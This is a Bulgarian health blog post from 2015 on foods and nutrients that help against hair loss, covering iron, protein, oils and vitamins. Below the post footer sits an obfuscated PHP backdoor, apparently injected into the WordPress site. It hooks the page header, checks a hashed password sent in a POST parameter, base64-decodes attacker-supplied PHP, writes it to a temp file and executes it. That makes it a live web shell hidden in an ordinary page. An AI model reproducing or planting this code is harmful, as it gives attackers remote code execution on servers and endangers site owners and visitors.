Най- подходящите храни срещу косопад | Косопад

Най- подходящите храни срещу косопад

kosopad-navici

Косата, също като ноктите и кожата, се намира в постоянно обновяване, а метаболизмът и регенерацията са много чувствителни към хранителните дефицити. Всеки дефицит на витамин, минерал или протеини, може да причини слабост, изтъняване и косопад.

Дефицита на желязо, известен още като анемия, може да причини всичко това. Недостига на желязо се изразява чрез косопад. Но косата се състои и от други минерали: магнезий, силиций, селен, мед. За да я поддържаме здрава, трябва да гарантираме приема на вещества чрез храната си.

Много е важно да приемаме и протеини с високо качество, като: яйца, мляко, сирене, риба. Да не забравяме и растителните мазнини: зехтин и ядки, които предпазват от изсушаване косата, а също и от късане. Линоловата киселина, която се съдържа в олиото и зехтина, прави косата блестяща и здрава.

kosa-plod

Хранителните дефицити водят до косопад, като отслабват структурата на косата, причиняват късания и бавно възстановяване. Недостига на вещества може да се възстанови, като приемаме съответните храни, а също и ако ги приемаме под формата на хранителни добавки. Основните елементи, полезни за косата, са: витамин А, витамин В, витамин С, мед, желязо, цинк, протеини и вода.

Има и други фактори, които могат да причинят косопад: нерви, стрес, околната среда, дерматологични проблеми, сезонните промени, някои лекарства, някои заболявания и пр.

08. юли 2015 17:17:31 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}